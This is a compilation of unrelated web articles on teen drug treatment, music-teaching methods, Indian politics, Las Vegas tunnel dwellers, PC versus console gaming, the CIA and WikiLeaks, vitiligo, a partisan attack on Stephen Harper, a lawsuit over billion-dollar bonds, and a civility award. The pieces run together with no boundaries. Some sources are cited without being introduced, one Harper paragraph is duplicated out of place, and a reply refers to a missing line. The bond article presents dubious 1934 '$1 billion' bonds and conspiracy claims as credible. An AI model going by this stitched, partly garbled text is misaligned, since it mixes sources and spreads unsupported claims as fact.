Though schools are a primary culprit in pushing youths into unneeded treatment, parents do their share too. Alan Leshner, director of the National Institute on Drug Abuse (NIDA), told the Dallas Morning News in 1997 that most youths in treatment “are either court-mandated or what we call ‘mommy mandated.'” At such facilities as the Hazelden Foundation in Center City, Minnesota — one of the largest treatment centers in the country — relatives accounted for nearly half of all youth admissions in 1998.
“C.D.”, a Connecticut teenager who recently completed treatment at an outpatient center in Connecticut says that most of the teenagers were placed in the program by their parents, often against their own will. “Some of them were forced into it by threats by their family,” she says, estimating that only “50 percent” of the kids in the program had real drug-abuse problems.
“Parents are scared shitless about this,” says Stanton Peele, a New Jersey psychologist and author who specializes in addiction. “They're afraid their kids are going to end up like David Kennedy and die of heroin or something.”
Just ask Al Levesque, who says his mother forced him to enter three separate rehab clinics in Connecticut over a three-year period, beginning at age 14. He was admitted for marijuana use every time, despite the fact that he used the drug moderately. His mother, he says, saw him as an “out of control teen.”
“I don't think that I ever did — or do — have a drug problem. I've always been a good student, and I've always been very productive,” says Levesque, now 23 and finishing his last semester at Western Connecticut State University.
Levesque literally spent years in treatment at his mother's bidding. Most of his stays consisted of outpatient treatment — in which the client is not hospitalized but attends day sessions — but he often spent “every waking hour of his day” at the treatment facilities. In one instance, he was required to attend treatment 40 hours a week for nine months.
The results of his “rehabilitation”? Levesque continued to use marijuana responsibly, and has not moved on to regular use of harder drugs. He is currently vice president of the WCSU chapter of the National Organization for the Repeal of Marijuana Laws.
Of course, many in the federal government and the treatment industry heartily approve of the increase in adolescent treatment, saying the trend parallels an overall increase in teen drug use over the past decade.
“We know that drug use remains very high [among teenagers], and we're working to lower that,” says Bob Weiner, spokesman for US drug czar Barry McCaffrey.
Drug use among teens increased after 1990, but has begun declining again in recent years, according to school surveys. But the only significant increase has been with marijuana use, which rose substantially from 1991 to 1999, according to the NIDA-funded Monitoring the Future Study. In 1997, marijuana was the primary substance of abuse in about half the treatment admissions for people younger than 20. The use of all other illicit drugs, including cocaine and heroin, has increased by only a few percentage points.
Carol Falkowski, a senior researcher at Hazelden, says the rise in marijuana admissions is justified. “More kids are being exposed to a more potent form of [marijuana] at a younger and younger age,” she says. “Kids are running into real problems.”
But, says Drucker, an increase in use does not necessarily lead to an increase in abuse, particularly in the case of a drug that has never been proven addictive and is considered by many to be safer than alcohol.
“How the hell do you treat somebody for using marijuana?” he asks. “Frankly, there's no evidence of an effective form of treatment for those who do have problems with marijuana.”
By definition, however, the federal government's “zero tolerance” policy considers virtually any drug use — regardless of the type of substance or frequency of use — as “abuse.” The result, say critics, is a “one-size-fits-all” model of drug treatment. This model is based on complete abstinence, which many criticize as simplistic, even some whose job it is to advocate abstinence-based treatment.
“If teenagers use drugs at all, they've already met the criteria [for drug abuse],” says Pat Harrison, manager of health care research at the Minnesota Department of Human Services. “We can't teach safe and responsible use to minors because of the zero-tolerance policy. So you're left with no choice but advocating total abstinence, which isn't particularly effective.”
The scarce statistics the government keeps on frequency of drug use by teens entering treatment seem to support the notion that many of them do not belong there. According to the federal government's Treatment Episode Data Set for 1996 — the year in which teen marijuana use was at its most recent peak — close to 30 percent of the kids who were admitted for marijuana use reported “no use in the past month” upon entering treatment. Another 15 percent reported using only “one-to-three times in the past month.” Only 32 percent reported daily marijuana use.
Meanwhile, while kids with minor drug problems fill treatment slots, others with serious addictions are left out in the cold.
According to a July 1999 report by the California Legislative Analyst's Office, only 10 percent of adolescents who are estimated to need publicly funded treatment receive it. Nearly 2,000 wards of the California Youth Authority are waiting to get into drug rehab programs, according to a recent Los Angeles Times article.
Access to treatment often depends on being able to afford it, says Brian Greenberg, a psychologist who is vice president of the Walden House Adolescent Treatment Center in San Francisco. For many low-income families, says Greenberg, the only adolescent treatment available is through the juvenile justice system. This puts the parents of many young addicts in a tough spot. “If a family doesn't have health insurance, sometimes they will err on the side of calling the police when their kid gets into trouble because it's the only way to get treated,” he says.
“Ironically, the kids that are labeled ‘at risk' by the government [often] don't get any of the help that they need,” Brown says.
Everybody learns differently and this trait is not new. Nevertheless, we have emergent and new teaching styles that may not involve physical, audio or visual means. We can learn the new skills since they are a handful and can be used at various levels. Leaning can be considered as a complicated concept but unique in certain ways. We have several methods in learning music and perhaps you know one or none. You will be surprised that you can learn music and practice it in various ways. The normal experience is for a young individual to learn music by listening and apply a musical instrument.Historic times bring about different educators who come up with several ways of teaching music so as the learners can grasp music and truly comprehend it. Most of these methods are widely used from childhood nevertheless it is not late to learn music. Below are widely known methods of learning music:
Orff Approach
This is one teaching method that enhances singing, dancing, acting and wide use of musical instruments. For children, they can play while learning music with fun. This method was first developed by Carl Orff, a co-founder of Gunther-schedule a school for dance, gymnastics and music. For children, they will compose their music based on performance. For teachers, they have the freedom to devise the classes. This involves making music composition, use of musical instruments or composing poems. A teacher may include stories to improve class involvement.
Kodaly approach
This is the second method which traces its origin from Hungary. This approach checks on singing voice as the tool to comprehend music. Traditional folklore fits well in this method as all elements involve musical culture. There is also use of hand signs, pictures, rhythm, and symbols. Kodaly had the premonition that anyone can potentially do well in music. The music involves the use of movements and games as well as writing and reading. At the beginning of progress, one uses a pentatonic scale and the learning sequence involves listening—singing—writing—making new songs. This is one method that is used to develop ear and listening traits.
Suzuki approach
This is one method with origins from Japan and later adopted in the USA in early 60's. The method was used to teach violin but now it can also be applied in various instruments. This method centre the parents use of mother tongue with view that a child may have no problems in singing in own native language and this principle works in music.
Dalcroze approach
This is one approach of connecting with music, mind, movements and whole body. It was originally developed by Emile Dalcloze with aim of improvising ear training sessions. As a student you will have to express the rhymes by making movements such as clapping and stepping.
To conclude, it is interesting to have a variety of theories where we can teach music. Most of the aforementioned techniques are now used in music schools and are a great approach for music tutors. Find out what method your music tutor uses.
During the launch of his book "President Pranab Mukherjee - A statesman" at Rashtrapati Bhavan, Prime Minister Narendra Modi today got emotional while talking about President Pranab Mukherjee.
"Yeh mere jeevan ka bohot bada saubhagya raha ki mujhe Pranab da ki ungli pakad kar, dilli ki zindagi me apne aap ko set karne ki suvidha mili (it was a very big privilege of my life that I eased into life in Delhi holding Pranab da's hand)," PM Modi said.
Prime Minister Modi compared him with father figure and appreciated his time spent working with him.
Praising President, he said, "Like a father figure, Pranab Da has guided me. He would tell me, Modi ji please take adequate rest, take care of your health."
He further said, "The Presidency is much more than protocol. Through the photographs in the book, we see the human side of our President & we feel proud."
President Pranab Mukherjee responded by saying: "I take this opportunity to express my deep gratitude and appreciation to PM. We have acted in close co-operation."
But I thought Bernanke and Geithner had already fixed the economy...
---
Deep beneath Vegas's glittering lights lies a sinister labyrinth inhabited by poisonous spiders and a man nicknamed The Troll who wields an iron bar.
But astonishingly, the 200 miles of flood tunnels are also home to 1,000 people who eke out a living in the strip's dark underbelly.
Some, like Steven and his girlfriend Kathryn, have furnished their home with considerable care - their 400sq ft 'bungalow' boasts a double bed, a wardrobe and even a bookshelf.
They have been there for five years, fashioning a shower out of a water cooler, hanging paintings on the walls and collating a library from abandoned books.
Their possessions, however, are carefully placed in plastic crates to stop them getting soaked by the noxious water pooling on the floor.
'Our bed came from a skip oustide an apartment complex,' Steven explains. 'It's mainly stuff people dump that we pick up. One man's junk is another man's gold.
‘We get the stuff late at night so people don't see us because it's kind of embarrassing.'
Read the story and see more photos at the Daily Mail...
###
Check out this brand-new slideshow...
---
Must See - Christmas Bailout Cartoon...
---
There are some new boxes of electronics coming that sit under your TV and claim to play games. They're also television cable boxes and will watch you sleep/kiss your partner/touch yourself.
Instead of buying one of those, you should buy a PC. Here's why.
It's not a monoculture
The gradual erosion of consumer rights that's taken place since the advent of broadband has not been pleasant. Gamers are worse off than they were ten years ago. This is true on PC and console.
What's taking place with the XBox One and PS4 is that the console manufacturers are catching up to the digital rights licensing that PC gamers have been coming to terms with since Steam debuted. The details of what Microsoft have proposed (and I believe Sony will have a similar scheme) is different – better in some ways, worse in others – but it's broadly the same. You have permission to play your game if you buy a copy of it. That permission is granted unless we decide it isn't. We'll grant you access on our terms. And while we'll try and give you a fair stab at reselling your games, it's not entirely aligned with our business, so it's probably best you just accept that it's not going to happen because we'll be able to withdraw that feature when we feel like it.
But there's a difference between Steam and the consoles: Steam is a closed system on an open platform. Steam's platform dominance isn't complete. Steam has to compete with other services for your custom. Steam isn't the only game shop in town.
Game prices are driven downwards as retailers compete. And alternatives spring up: Good Old Games offers DRM free games for sale. Humble delivers astonishing deals on a weekly basis. There are very, very big games that won't touch Valve's platform, like League of Legends, Minecraft, World of Warcraft and World of Tanks.
What's clear is that many of the consumer rights we as gamers take for granted will fall away as publishers, manufacturers and developers dream up new ways to control access to their product. Government and enforcement cannot keep pace, and has shown zero interest in reinforcing those rights. The only mechanism to have an effect is through consumer choice.
There is no choice on an Xbox One or a PS4. There is choice on PC.
Backwards compatibility comes as standard
If you'd have bought your third party games on PC, not only would you be able to play them on your new PC, they'd be better. It's not just backwards compatibility: think of the side compatibility benefits. Your game library can exist over multiple machines and form factors. You can have a PC in an office, bedroom or den, or under a television, and a laptop, and in a few years time, an affordable Haswell powered tablet with broadly the same specifications as an Xbox One. Your game library is guaranteed to work across all these machines. And any future machines you buy.
Imagine that: being able to buy a game, and then play it forever.
You choose what you pay
The argument that PC gaming is expensive just isn't true. Console gaming is expensive. If Microsoft and Sony kill the used game market, the next-generation will probably be even more expensive.
Games are generally cheaper on PC – although EA and Blizzard have quietly raised their new game prices over the past two years – most games debut at around £30/$45/30Euro.
Charging gamers to access online services through Xbox Live was a stunning cash-grab for Microsoft. It's a tax on games that simply should not exist. Paying for playing online on PC is a ridiculous concept. Yes, there are subscription games on PC. But playing them is a choice.
What's baffling about PC isn't that you don't get charged for playing online – it's that increasingly you choose entirely what you want to play for anything. You can happily enjoy League of Legends without stumping up a penny. Same with Planetside 2. Most indie games will enjoy a brief pay-what-you-want bundle moment. And prices are so flexible that you'll find AAA games available for next-to-nothing if you do a bit of research.
The hardware is cheaper than you might expect
If you want to buy a PC that can sit under your television, you will probably pay a premium. I think the Alienware X51 is a great little machine, but it's definitely more expensive than a console. While we all got a bit excited about Steamboxes, there's been little sign of any real hardware, and I personally doubt we'll see anything concrete for years.
The alternative is building one yourself. Building a PC is both easy and fun. You should do it, and you could do it. PC building is pretty close to lego – it will take a couple of hours at most, and you will feel an absurd sense of pride at what you've accomplished. The parts won't cost the earth. In a few weeks, we'll put together an incredibly basic step-by-step list of what you need to buy, and how to put it together.
A PC plays TV and movies and music, but it doesn't make such a song and dance out of it
If you build a PC to replace a next-gen console, Steam's Big Picture Mode is how you'll probably access most of your games – it's an interface for accessing your games that's been designed for joypads. Think of it as Steam's version of the Xbox interface. With a bit of fiddling, your PC can boot directly into Big Picture Mode. The good news about Big Picture Mode is that it doesn't carry spam advertisments for Wreck It Ralph or William Hill's Online Casino. There is a shop, but it's nice and tucked away. It's kind of lovely.
If you want to watch Netflix or Hulu or the iPlayer, you can knock yourself out: Big Picture Mode has a fast web browser. And if you want to watch live TV? Just turn the channel. It's not hard.
Mods are amazing
PC game mods sound complicated and technical and weird. But they're really not. They're just unbelievably cool. It's gamers working together to improve and or twist what publishers have already created. Together, they make games way more valuable. Modding your games has never been easier.
A few years ago, Steam introduced the Workshop – it's a way for community creators to share their projects. It manages the installation, patching and updating of mods in a neat way. You just get to pick and choose what you want to play. I'm currently working my way through the best of the Portal 2 workshop – there are levels in there that are easily the equal of what Valve created. Similarly, Skyrim on PC is a towering work of community led genius – there are full blown expansions available for free.
But it's not just more stuff: it's a chance for gamers to correct and improve games.
The future is on PC: if you're a hardcore gamer, you'll want to be a part of it
I think I'm one of the few people on the planet who think the Kinect is kind of okay. I lost a stone playing Kinect fitness games. That was cool.
But that peripheral does not compare to the incredible hardware revolution that is taking place on PC right now. Oculus Rift gets the headlines: fully functional virtual reality right now. Amazing. The Razer Hydra is special, too – it's like the Wii remotes done to a level of precision and responsiveness you wouldn't believe possible. Although it's a over-priced and a bit too heavy, I love the ambition of the Razer Edge – it's a kind of hardcore PC tablet hybrid that I think is about two years ahead of its time. There's more coming: Valve have been talking about biometric analysis since forever.
It's not just limited to hardware. The PC is where new trends and genres form. Minecraft's success proves the point, but it's not the only example. Right now, we're seeing the first glimpses of what true survival games should play like, with the DayZ mod. Dota and League of Legends have pioneered a absurdly addictive strategy gametype. You can draw a direct line between Counter-Strike and the success of Call of Duty multiplayer. Battlefield began, and is at its best, on PC.
What's next? DayZ's going to own the planet. Cube World, too, probably. Then… I don't know. But finding and playing it is most of the fun.
Don't take my word for it
If you've been a console gamer all your life, I can understand if you're skeptical. The PC is different. We don't see the same lavish marketing budgets from platform owners. Shops are dead to us, so we're kind of invisible to the real-world.
But despite the invisibility, we're thriving, because it's such a wonderful, friendly place to play. PC gaming just /feels/ right
So don't just take my word for it – have a chat to other PC gamers. They'll evangelize in exactly the same way. They'll explain you don't have to pay over the odds to play. They'll want to help. If you ask nicely, they'll probably spec a PC and build it for you.
Lastly: please don't treat what I've said as an argument. Treat it as an invitation. We want you to come and join us.
The head of the CIA lumped WikiLeaks with al Qaeda and the Islamic State and said his agency is working toward reducing the “enormous threat” posed by each of them.
CIA Director Mike Pompeo placed the antisecrecy website in the same category as terrorist organizations while speaking Thursday at the Foundation for the Defense of Democracies' National Security Summit in D.C.
“I talked about these non-state actors, and it's not just Wikileaks. Indeed I may have overemphasized them — they are an enormous threat, we are working to take down that threat to the United States as well, to reduce the threat from all of it,” Mr. Pompeo said. “But Hezbollah, [the Islamic State], al Qaeda, none of them sit at the U.N., these are all non-state actors, each of which has not only cyber capacity, but they look and feel like very good intelligence organizations.
“All the tradecraft that you read about from the excellent work that the agency's done and that our state competitors have done for decades and decades, you now see it being adopted by these non-state agencies,” Mr. Pompeo continued. “They run assets; they run counterintelligence program; they lure dangles — all the tradecraft that you read about from the excellent work that the agency's done and that our state competitors have done for decades and decades, you now see it being adopted by these non-state agencies. “
WikiLeaks publisher Julian Assange scoffed at the CIA chief's remarks.
“All serious news organizations develop and protect sources with the intent of publishing what they find,” Mr. Assange told The Washington Times. “To suggest that media organizations are intelligence agencies is as absurd as suggesting that CIA employees are journalists. This ridiculous claim has a transparently insidious purpose: to gain the legal authority to treat journalists and publishers as terrorists for simply doing their job, holding the CIA to account.”
When reached for clarification, CIA spokesman Dean Boyd told The Washington Examiner that Mr. Pompeo's remarks “described the counterintelligence threats posed by WikiLeaks and other non-state hostile intelligence services — including Hezbollah and ISIS — and the need to counteract the counterintelligence efforts that these groups employ against the United States.”
WikiLeaks launched in 2006 and has since published more than 10 million documents, by its own accounting, including classified Pentagon and State Department materials as well as a trove of CIA hacking tools released earlier this year.
The Justice Department began investigating WikiLeaks and its staff in 2010, and members of the Trump administration including Mr. Pompeo and Attorney General Jeff Sessions have endorsed escalating that probe and arresting Mr. Assange, an Australian citizen currently residing in London after receiving political asylum from Ecuador.
Mr. Assange took refuge inside Ecuador's London embassy in 2012 while wanted for questioning in Sweden regarding allegations of sexual assault. Swedish prosecutors dropped that probe this year, but Mr. Assange has refused to leave the embassy over fears he'll be arrested by British authorities and subsequently extradited to the U.S. and charged in connection with WikiLeaks publishing state secrets.
Copyright © 2019 The Washington Times, LLC. Click here for reprint permission.
Q. Vitiligo is mainly a skin disorder, but can it also harm my eyesight?
A. Ordinarily not, but in some unusual cases, yes, according to Dr. Christopher E. Starr, director of the Refractive Surgery Service at NewYork-Presbyterian/Weill Cornell Medical Center.
Vitiligo (vit-uh-LYE-go) is an autoimmune disease in which the melanocytes, the body's pigmented cells, are targeted and destroyed.
“Our eyes also have a large number of pigmented cells, primarily in the iris and retina, and thus eyes can be another target in the inflammatory process that causes vitiligo,” Dr. Starr explained.
The most common eye effect, seen in about 30 to 40 percent of patients, is loss of pigment in the cell layer just outside the retina, called the retinal pigment epithelium, and the attached layer, called the choroid, where blood vessels nourish the retina. Usually, however, this does not have a significant effect on vision.
More from Michael Harris available More fromavailable here
As Prime Minister Stephen Harper attacks the Chief Justice of the Supreme Court in broad daylight, there is a question Canadians need to answer fairly soon.
What's it going to be: a modern democracy or a Steve's banana republic of the north?
Steve likes people docile. He appears to have tamed a lot of the realm. He kicks, the subjects cringe. He kicks some more, they slip into the woods of indifference. They are so disconnected that they no longer hear the screams of the other kickees: Linda Keen, Bill Casey, Kevin Page, Marc Mayrand, even Sheila Fraser — and now, and now, Beverley McLachlin, the Chief Justice of the Supreme Court of Canada.
The train wreck of the Harper government continues to roll down the mountainside, crushing body after body, yet no one utters the right word. Allow me. Canada is a dictatorship in the making.
Did you ever know a person who just kept taking more and more from a relationship until you had to draw a line? A person for whom there are no rules, just a bottomless appetite to have it all their own way?
If so, you know exactly what I'm talking about. I give you our prime minister — a man who needs to be stopped before he starts appearing on the money. Either that, or we all better practise the curtsey.
Look at all the portfolios and offices now held by Steve.
The proclamation for the upcoming National Day of Honour, commemorating the end of a war in Afghanistan that should never have begun, was announced by Governor-General Harper. Governor-General Harper will also receive the last military flag from Kandahar, while David Johnson watches.
Commander-in-Chief Harper will have the spotlight at the National Day of Honour ceremonies; the real generals who commanded troops in Afghanistan were not invited because they do not like blue Kool-Aid.
Speaker of the House of Commons Harper ruled that it was perfectly okay to keep information from the opposition because they were not real MPs anyway.
Chief Justice of the Supreme Court Harper has declared that the appointment of Marc Nadon to the Supreme Court was completely in order — despite his 6-1 rejection by that other interventionist-court.
Intergovernmental Affairs Minister Harper declared that Quebec was a “nation”, though the matter was never discussed in cabinet, nor for that matter, passed on to the pretend intergovernmental affairs minister back then, Michael Chong … and on and on.
I have never been one to buy the “Steve is a genius” thesis. It is put about by people who really just like being on the winning side. I think you will find those same people will invest our next prime minister with genius — whoever he or she may be.
Nor do I buy the notion that if you raise your voice against Steve, it's because you hate him, are in the pay of a foreign government, are a conspiracy theorist, or have recently been seen in public with David Suzuki.
Those are not arguments, but truncheons for making sure none can be made. They are not part of a dialogue, but dialogue's graveyard. They are Steve's native tongue, newspeak. You know, “We're right about the elections legislation because everyone else says we're wrong.” That stuff.
Based on his actions, the PM is a misanthropic powermonger who misread 1984; the hero was Winston Smith, Steve, not Big Brother. This PM has so many fundamentally warped ideas about Canada that it won't be long before he appears in public in a uniform.
Harper's poisonous toads began whispering in the corridors of the Commons that McLachlin had crossed a line. In doing their master's bidding, they implied that the Chief Justice had somehow been against the Nadon appointment and had moiled against it.
Sorry … he already has, though it violated military protocol. How could I forget Steve in that flight jacket with real pilot wings on it, flying over the flooding in Alberta? I suppose he forgot that if there's one thing real servicemen hate, it's a civilian wearing as a prop a uniform which he is not entitled to wear.
Steve has never shown much insight into Canada, though he was cunning enough in the beginning to know that the country was asleep at the switch. He thinks that, under our system, Canadians elect governments — when they actually elect parliaments. Under Steve's view, if you are not a Conservative MP, you are nothing at all. Which is why he wouldn't share public information with the opposition, a misinterpretation of the rules that earned him a contempt of Parliament ruling.
He had so much contempt for the Senate, a place he once described as pasture-land for the PM's buddies, that his own office tried to undermine that separate parliamentary institution in an operation so shady it brought down a criminal investigation by the RCMP.
This week, Steve's calm Kabuki mask slipped off. Underneath, for all to see, was what former mentor Tom Flanagan has been talking about on his latest book tour — the suspicious, vindictive, secretive man who routinely plays politics right up to, and occasionally over, the edge of the rules.
I cite those words carefully. In one of the scuzzier low blows in politics I've seen in a long time, Steve unleashed his goons on McLachlin, someone he knows has very little ability to defend herself publicly.
Harper's poisonous toads began whispering in the corridors of the Commons that McLachlin had crossed a line. In doing their master's bidding, they implied that the Chief Justice had somehow been against the Nadon appointment and had moiled against it; that her attempt to communicate some constitutional reality to Harper before he made an ass of himself with his SC choice was in some way “political.” It was actually normal, not to mention merciful. Steve needs help. Given his batting average in the Supreme Court, he needs a lot of help.
Instead, Steve didn't merely fail to put a stop to the drive-by smear of the chief justice, he lathered on a few greasy streaks of his own. He said he did nothing wrong in the unconstitutional appointment of Marc Nadon. And you know what that means. It means that the chief justice was wrong. You know the fundraising letters have already gone out to the Conservative base: the Harper government's plans were stymied by an interventionist judge.
I wonder if that also means Steve doesn't feel bound by the ruling. I suppose we'll know if Marc Nadon becomes the next Chief Justice. That's payback, Steve-style.
So what is the demonization of McLachlin all about? It's about five glaring, embarrassing, damaging, unnecessary, and perfectly justified defeats in the highest court in the land. Harper is not a lawyer and really had no idea what he was talking about on Senate reform, on judicial discretion in sentencing, on prostitution laws, on safe injection sites, or Marc Nadon's appointment.
So now Steve has shown contempt for the House of Commons, the Senate and the Supreme Court. Interesting, that. In the world of Stephen Harper, you are overstepping your authority when you catch him in a lie, faulty reasoning, or dealing from the bottom of the deck in elections.
Canada's motto used to be ‘Peace, Order and Good Government.' ‘Outta My Way' is hardly an improvement.
Michael Harris is a writer, journalist, and documentary filmmaker. He was awarded a Doctor of Laws for his “unceasing pursuit of justice for the less fortunate among us.” His eight books include Justice Denied, Unholy Orders, Rare ambition, Lament for an Ocean, and Con Game. His work has sparked four commissions of inquiry, and three of his books have been made into movies. He is currently working on a book about the Harper majority government to be published in the autumn of 2014 by Penguin Canada.
Readers can reach the author at [email protected]. Click here to view other columns by Michael Harris.
The views, opinions and positions expressed by all iPolitics columnists and contributors are the author's alone. They do not inherently or expressly reflect the views, opinions and/or positions of iPolitics.
Brandon Turbeville
Some weeks ago, I wrote an article dealing with a bizarre lawsuit full of twists and turns that has been filed against individuals, governments, private institutions, and secret societies spanning the entire globe. Essentially, the plaintiff of the lawsuit is alleging that billions of dollars worth of U.S. bonds were stolen from him by a wide-ranging cartel — bonds that he was entrusted with by the extremely rich and reclusive Dragon family of Asia.
But what at first may seem like an isolated incident, now appears to be an emerging pattern of theft of U.S. bonds from individuals who have either acquired them individually or have had them passed down through generations. That is, at least the claims of stolen bonds are becoming more and more common.
Take, for instance, another recent lawsuit filed with the Eastern District of Pennsylvania – U.S. Federal Court, by Joseph Riad.
Riad is suing the U.S. Federal Government for $15 billion as a result of the fifteen $1 billion bonds that he alleges have yet to be returned to his possession by an agent of the Department of Homeland Security. Riad claims to have a total of 735 $1 billion Federal Reserve bonds that are stashed in banks outside of Philadelphia where he lives. These 735 are in addition to the 15 bonds he is suing for.
The 15 bonds at issue, according to Riad, came from three rare “sealed and certified bronze boxes,” each of which contained 245 $1 billion Federal Reserve bonds dated back to 1934.
As Reuben Kramer of Courthouse News Service writes , “The billion-dollar bonds allegedly were used by the government for debt-management purposes in the 1930's when physically moving lower-denomination currency or gold was impractical.” Riad allegedly discovered the bonds after his attorney suggested he open the boxes to determine whether or not there was anything of value inside them.
But, while some may automatically assume that Riad's claim is false or that his bonds are fake, all indications are that the bonds are, in fact, real. Indeed, Riad has cited in his lawsuit “extensive and exhaustive proof of the authenticity of the Bonds.” However, according to Riad, no federal agency will redeem them, despite this proof.
As part of his case, Riad has provided what he calls and Affidavit of Procurement , in which he states that the boxes became collateral for over $76,000 in loans made by him to “a mandate to the South African government.”
Riad claims that he has spent nine years confirming the authenticity of the bonds, including contacting a number of officials and experts in the field of bonds, finance, and sculpting and metal.
Riad claims that he contacted “Kermit Harmon, PE, CEM, CCP, DGCP, a former Security Director for the Dallas Federal Reserve Bank, and an expert in bonds, notes, and other financial instruments,” and that Harmon, along with “Bruce Colburn, PhD., PE, CEM,” inspected these bonds meticulously and determined that they are authentic government-issued Federal Reserve bonds. Riad has attached the report made by Harmon and Colburn to his lawsuit as an exhibit.
Riad also claims that he consulted “A.J. Obara, internationally-renowned bronze sculptor and bronze metal expert,” who “inspected Plaintiff's three bronze boxes containing the bonds.” It is then claimed that Obara also confirmed the authenticity of the bonds. Like Harmon's report, the report by Obara is also included as an exhibit to the lawsuit.
Furthermore, the lawsuit claims that Riad contacted Dr. Franklin Noll, “a consultant with the Bureau of Public Debt who is an historian with expertise in the history of government-issued, high-denomination bonds, such as this Plaintiff possesses,” as well as former Deputy Secretary of the Treasury, Stuart Eizenstat, Esq., and Patrick Oxford, Esq. of Houston, all of whom recognized the bonds as real and authentic.
Riad asserts that he was then referred to the Secret Service, where he met with Secret Service agents Chad Sweet and Craig Caldwell who took the bonds, confirmed their authenticity, and then returned them. Again, Riad includes the report that the agents produced in reference to their documentation of the receipt of those bonds, as an exhibit in the suit. It should be noted that the filing points out that if the bonds had been fraudulent or fake, the Secret Service would have been bound by law to seize them and that they would not have been returned.
This is where Riad claims his fortunes took a turn for the worse. He claims he was referred to the Bureau of Public Debt, and specifically to an official of that department by the name of Donna Ayers. However, according to Riad, Ayers completely denied the existence of such bonds and referred him back to the Secret Service agents, who, in turn, “inspected plaintiff's bonds, reviewed the accompanying expert reports, and performed their own evaluations and tests so as to render their own opinion as to the authenticity of plaintiff's bonds.”
Riad claims that the agents then contacted Ayers and “informed her that plaintiff had completed the appropriate and required examination and authentication of the Bonds and that the redemption of said bonds did fall under the purview of the BPD, since the bonds were outstanding government issued securities/debts.” However, Riad states, he still received no cooperation from the BPD and was forced to take other avenues.
These other avenues led Riad to the Department of Homeland Security and an agent, Nickolaus Jones, who Riad claims was determined to fraudulently acquire the bonds. Riad claims he learned about Jones through a man named Neil Gibson, an individual that was,
an alleged British financial consultant who claimed to have experience in the repatriation of high-denomination U.S. government bonds, and who represented to plaintiff that he had a contract with the U.S. government to complete such transactions and that he had successfully handled such projects on behalf of the U.S. government in the past.
The lawsuit further states that Agent Jones confirmed his ability to repatriate U.S. government bonds and that he had a working relationship with Neil Gibson in this specific regard. Jones then confirmed the bonds held by Riad as bonds he already knew existed and told Riad that he wanted to know more about them. This, Riad claims, was all part of the ultimate deception.
Nevertheless, Riad says he met with Agent Jones at Jones' Irvine, California government office for approximately three hours in March 2009. According to the suit, Jones once again confirmed for a second time that he was an agent with DHS, and produced his identification badge and business card to prove it.
However, Riad says there was another man present at the meeting who refused to do any of those things, even after being asked repeatedly by Riad and his then-lawyer for identification. Interestingly enough, Jones made no attempt to help identify the man either, even though he was witness to a discussion involving such a large amount of money.
Continuing the story, the filing reads:
Based upon Agent Jones' stated and apparent authority to act on behalf of the U.S. government as a DHS agent [and] . . . based upon the fact that Agent Jones repeatedly and unequivocally told plaintiff and Mr. Oxford [his then-attorney] of his ability and authority to assist plaintiff with the repatriation of his bonds . . . plaintiff provided Agent Jones with fifteen (15) of the at-issue bonds: five (5) original bonds from each of the three (3) metal containers, as well as the treasury-produced authentication documents . . . .
Surprisingly, Agent Jones refused to sign . . . [an] inventory, and he refused to issue a general receipt to plaintiff indicating that he received the bonds from plaintiff. However, in that meeting, Agent Jones assured plaintiff and Mr. Oxford that he would return the bonds to plaintiff after he completed his investigation into the authenticity of the Bonds, and that said investigation would take approximately one week to complete. Because they were meeting in DHS offices and given that Agent Jones had provided valid identification and appeared to be a legitimate member of the Irvine, CA DHS staff, plaintiff, upon advice of counsel, reluctantly provided the bond samples to Agent Jones.
Riad's lawsuit provides the court with what it claims are copies of Agent Jones' identification and business card as exhibits, as well as some email communication exchanged between Riad and Jones.
After about a week, Riad claims, he was contacted by Agent Jones via email and told that his bonds were not authentic. After so much evidence to the contrary, Riad claims that he demanded his bonds back from Jones, who promptly refused, stating that he had destroyed them. It is then alleged that Jones stated he could not explain his investigation methods and procedures with anyone who did not have the proper clearance. Fortunately for Riad, Kermit Harmon, who had helped identify the bonds as authentic earlier on, had such clearance. Thus, Riad then demanded a face-to-face meeting between Harmon and Jones. However, Jones subsequently refused to continue discussing the matter any further with Riad or his then-lawyer, Mr. Oxford, essentially killing the communication between them.
Riad's lawsuit claims that Agent Jones is either currently in possession of the bonds himself or has transferred them to a third party.
It states, “Retrospectively, it is clear that Agent Jones, while operating under the actual and apparent authority that is inherent to his position as a U.S. agent with the DHS, provided plaintiff with false and/or misleading documents and information with the intent to illegally obtain the Bonds from plaintiff.”
The interplay between members of official government agencies and shadowy individuals who seem to appear at just the right moment to develop trust, only to then disappear back into the shadows after a large amount of government bonds have been stolen, has popped up in the judicial system twice now. Indeed, this lawsuit bears traits very similar in nature to that of the Dragon Family suit filed weeks ago.
Unfortunately, we will have to wait and see how the suit works its way through the courts in order to see if any further information will come out regarding world governments' apparent attempt to prevent the theft of legally owned bonds and prevent them from being exchanged outside of the system it has designed as a rigged game. If the suit is to be believed, it will be interesting and quite revealing to witness the information brought out in the courtroom as it runs its course.
Needless to say, Riad's claims are certainly not unbelievable, especially when one is dealing with such nefarious organizations as the Federal Reserve and the Department of Homeland Security.
As it is, Riad is suing under the Federal Tort Claims Act, for what he alleges to be trespass, conversion and intentional representation. Albert Iacocca of West Chester, Pennsylvania is representing Riad in the case.
Brandon Turbeville is an author out of Mullins, South Carolina. He has a Bachelor's Degree from Francis Marion University where he earned the Pee Dee Electric Scholar's Award as an undergraduate. He has had numerous articles published dealing with a wide variety of subjects including health, economics, and civil liberties. He also the author of Codex Alimentarius – The End of Health Freedom, 7 Real Conspiracies and Five Sense Solutions. Brandon Turbeville is available for podcast, radio, and TV interviews. Please contact us at [email protected]
Has civility in public life become so rare that notable practitioners merit a prize?
That thought came to mind this week as Vice President Joe Biden and Sen. John McCain (R) of Arizona were honored for just that – a decades-long friendship marked by loyalty and good cheer, despite at-times sharp partisan differences.
But given the lack of civility in this year's presidential contest, such recognition may be more needed than ever. This is the fifth year that Allegheny College, a small liberal arts school in Meadville, Pa., has awarded its Prize for Civility in Public Life, and Messrs. Biden and McCain saw fit to appear in person Tuesday to receive their award and make remarks.
Allegheny President James Mullen framed the issue as no less than a threat to American democracy.
“The tone of our public discourse is driving young people away from the political process,” said President Mullen to the assembled students, alumni, and other guests at the University Club in Washington. “Unless we regain a civil footing, our democracy risks losing a generation from American politics, and with it their passion, their commitment to justice, and their joy in service to others.”
The problem is far greater than a certain Republican presidential candidate who was alluded to, but went unnamed during the event. There's the Republican who shouted “You lie!” at President Obama during a joint session of Congress in 2009. There's the Democrat who, a few weeks later, declared from the House floor that the GOP health-care plan is “die quickly.” There's Sen. Ted Cruz (R) of Texas, the once and probably future presidential candidate, who called his majority leader, Mitch McConnell, a liar on the Senate floor last year.
